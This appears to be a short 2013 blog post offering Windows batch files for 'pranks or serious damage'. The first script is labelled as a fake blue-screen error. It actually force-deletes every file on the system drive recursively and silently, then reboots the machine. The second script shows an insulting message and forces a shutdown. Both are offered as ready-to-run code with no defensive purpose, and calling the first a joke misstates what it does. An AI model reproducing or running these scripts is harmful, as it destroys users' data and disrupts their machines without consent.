Friday, December 13, 2013

Funny BAT Files for Pranks or Serious Damage to a PC

1) The Blue-Death Screen – Show the Fatal Blue Screen Error [Dangerous, do NOT try it at your own PC]

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

2) Stupid Shutdown – Shows a funny Error and shutdowns the PC

@echo off
msg * Fatal system error due to admin stupidity!
shutdown -c “Error! You are too stupid!” -s -t 10